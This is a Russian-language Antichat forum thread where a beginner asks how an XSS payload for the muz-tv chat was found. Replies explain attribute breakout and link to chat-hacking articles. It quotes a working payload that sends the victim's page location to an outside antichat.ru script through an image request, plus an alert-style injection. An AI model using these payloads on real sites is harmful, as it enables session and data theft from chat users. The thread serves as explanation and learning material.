ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Я качал я VIDEO.ANTICHAT.RU ролики и там вот напримере muz-tv_chat-xss чувак пишет:

В поле "О себе"
' style='background:url(javascript:document.images[1].src=/http:xxantichat.ruxcgi-binxs.jpg?/.sourse.replace(/x/g,String.fromCharcode(47))+opener.location)' s

ОТКУДА ОН ВАЩЕ ЭТО ВЗЯЛ? Откуда узнал что это сработает?

исходный код посмотри и всё поймёшь...

Код чего сайта

html код страницы куда впихнётся твой код с xss из поля "О себе" "

ты конечно извини за мою надоедливость но вот еще тебе вопросик: Как понять можно ли туда его запихнуть или нельзя? Что для этого нужно знать?

p.s. SORRI народ вы не думайте что я ламер но просто мне хочется узнать чуть больше обо всем этом!!! И к томуже вы тоже у когото этому научились так помогите и мне

Хм... Почитай статьи на ачате про взлом чатов... Тебе станет немного понятней, что это =)

http://antichat.ru/crackchat/index.html
http://antichat.ru/txt/old/chat_faq.shtm
http://antichat.ru/crackchat/java.htmll

Поищи в интернете в гугле www.google.com мануалы по XSS что да как и всё поймёш....

ПАСИБ! А что надо знать чтобы этим заниматся

http://antichat.ru/txt/old/chat_faq.shtml
http://antichat.ru/crackchat/java.html

это так к слову...


собственно вот в чём суть, если мы впишем в графе фото http://url_фотки/nax.jpg, то в окне "о себе" в html коде мы получим:

там в чате фильтровались некоторые символы, я точно не помню какие влом смотреть...

собственно если вписать в графе фото http://url_фотки/nax.jpg"><script>alert("nax")</script>, то на выходе получим:

я думаю тут нечего объяснять... это сработает только если символы не фильтруются!!!

дальше работает знание и воображение

http://ha.ckers.org/xss.html - тут можешь посмотреть множество реализация javascript'ов, поможет в дальнейшем освоении xss

а чтобы понимать xss нужно знание html и javascript